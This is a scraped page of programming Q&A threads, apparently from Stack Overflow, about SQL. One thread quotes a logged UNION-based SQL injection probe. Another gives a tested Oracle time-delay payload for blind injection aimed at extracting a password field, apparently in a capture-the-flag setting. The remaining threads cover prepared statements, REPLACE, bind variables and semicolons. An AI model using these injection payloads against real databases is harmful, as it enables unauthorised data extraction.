SQL Injection attempt, what does this query attempt to do? [duplicate] - sql

This question already has answers here:
Closed 11 years ago.
Possible Duplicate:
Site has been hacked via SQL Injection
Looks like one of my websites had a hacker attempt on it, my reports showed the following querystring data attempted:
QUERY_STRING = ID=-999.9%20UNION%20ALL%20SELECT%200x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-
It failed because any integer parameter I always cast to an integer so you get mismatch errors if anything like this is tried (classic ASP). But I'm confused what the query above is attempting? It doesn't look like anything I've seen before.

take a look at:
Site has been hacked via SQL Injection
at a first look a guess it was some automatic tool doing some blind sql injection.

Related

Oracle Sql - Time based sql injection

When trying to do an SQL injection on an Oracle SQL database I have the problem that most of the examples in the tutorials do not work. I already found out that I only can use CASE WHEN a THEN b ELSE c END instead of normal if statements.
The question I have now is how do I get time delay into the injection? Benchmark() and sleep() do not work either.
I already now that the table is named "flag" and the field name I want to read out is named "password".
My only information i get from the database is the time it needed to execute my input (or query since I bypass the input to inject SQL)
I found the following SQL statement on the web at SQL Injection Tutorial
select dbms_pipe.receive_message(('a'),10) from dual;
I am not certain I should be participating in this sort of thing, but since I found it with my first Google Search, I will go ahead and post it.
I tested it and it delayed the result by 10 seconds.

How does separated clause and args protect against SQL injection? [duplicate]

This question already has answers here:
How can prepared statements protect from SQL injection attacks?
(10 answers)
Closed 8 years ago.
I heard that separated SQL clause and args can protect against SQL injection. For example,
clause = SELECT * WHERE ID = ? AND NAME = ?
with ID = 23, and NAME = "Tom".
Can someone explain to me how it works?
Basically, you're making the distinction between data and the actual code (query part) very clear. You're telling the SQL server: this is clearly data and this is clearly code.
This way, you're basically skipping the part where the server has to pull apart the code and data from your query so there's no chance the server can misinterpret bits of data as part of your query.
Edit: as per the link in the comments, this answer pretty much answers your question much better than I've explained here.

SQL Server Replace Command with WIldcard [duplicate]

This question already has answers here:
Perform regex (replace) in an SQL query
(5 answers)
Closed 5 years ago.
I am in need of some help. Thanks to fellow user davids, I was able to get certain things working within SQL Server and am in need of some more help. Here is what I am trying to do:
UPDATE Table1 SET keyfield=(REPLACE(REPLACE(Column1,'http://*/folder/',''),'.avi',''))
UPDATE Table2 SET keyfield=(REPLACE(REPLACE(Column2,'http://server2/folder/',''),'.mpg',''))
Can anyone help me out or point me in the right direction to get the wildcard to work? This particular column, the * is an IP Address and it will change all the time. Granted I will know the IP's ahead of time and can probably do it one by one, but I would prefer to have it automatically replace. Thanks in advance!
You should look into regular expressions.
My google karma found this article in MSDN Magazine.
Edit:
See also:
Perform regex (replace) in an SQL query

What does a colon (':') mean in SQL syntax? [duplicate]

This question already has answers here:
Closed 10 years ago.
Possible Duplicate:
What does the colon sign “:” do in a SQL query?
Simple SQL question:
What does : stand for?
For example:
SELECT * FROM myTable
WHERE Employee_column = :P_EmplId;
The : isn't exactly easy to google when you don't know what this is called. Even searching here didn't help. I'm using Oracle 11g if that makes any difference.
It is a bind variable:
A placeholder in a SQL statement that must be replaced with a valid
value or value address for the statement to execute successfully. By
using bind variables, you can write a SQL statement that accepts
inputs or parameters at run time. The following example shows a query
that uses v_empid as a bind variable:
Most likely you took the query from a template. It is meant to be processed with php's MDB2 sql framework. The ":" (colon) signals a placeholder in the statement, meant to be replaced when the query is executed.

Should we end the statement in T-SQL with semi-colon? [duplicate]

This question already has answers here:
Closed 12 years ago.
Possible Duplicate:
When should I use semicolons in SQL Server?
When we are writing a SQL script in T-SQL, should we end each statement with a semi-colon? Does semi-colon work like 'GO' keyword? As of now, I see that it doesn't really matter, but I would like to know which is the best practice?
It's good to get into the habit now because CTE/WITH and MERGE need it, as well as some Service broker stuff as mentioned in the other question. Of course, you could use ;WITH cTE AS ...
C# etc monkeys have been doing it for years.
It won't work with GO because it isn't a keyword. It's a directive for SSMS and other tools to break a larger script into batches.